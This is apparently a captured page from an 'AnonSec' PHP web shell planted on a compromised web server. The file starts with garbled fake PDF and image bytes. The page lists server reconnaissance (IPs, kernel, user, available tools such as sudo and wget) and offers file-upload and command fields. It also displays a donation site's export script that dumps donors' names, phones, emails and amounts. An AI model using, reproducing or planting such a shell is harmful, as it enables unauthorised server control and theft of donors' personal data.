%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/admin_dons/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/admin_dons/export.php
<?php
session_start();

header("Content-type: text/csv");
header("Content-Disposition: attachment; filename=export.csv");
header("Pragma: no-cache");
header("Expires: 0");

require_once($_SERVER["DOCUMENT_ROOT"].'/Connections/french.php'); 
include($_SERVER["DOCUMENT_ROOT"].'/dons.class.php');
$lesDons = new dons;
$lesDons->search = $_SESSION["lesDonsSearch"];
//print_r($lesDons);
$dons=$lesDons->get_all(0,10000);

$csv = '';
$separator = ';';

$csv .= 'Nom'.$separator;
$csv .= 'Téléphone'.$separator;
$csv .= 'Portable'.$separator;
$csv .= 'Email'.$separator;
$csv .= 'Date'.$separator;
$csv .= 'Montant'.$separator;
$csv .= "\n";

foreach($dons as $don)
{
	list($date,$heure) = explode(' ',$don->date_creation);
	list($a,$m,$j) = explode('-',$date);
		
	$csv .= $don->titre.' '.$don->nom.' '.$don->prenom.$separator;
	$csv .= $don->tel.$separator;
	$csv .= $don->portable.$separator;
	$csv .= $don->email.$separator;
	$csv .= $j.'/'.$m.'/'.$a.' '.$heure.$separator;
	$csv .= $don->montant.$separator;
	$csv .= "\n";
}
echo $csv;

?>

Anon7 - 2022
AnonSec Team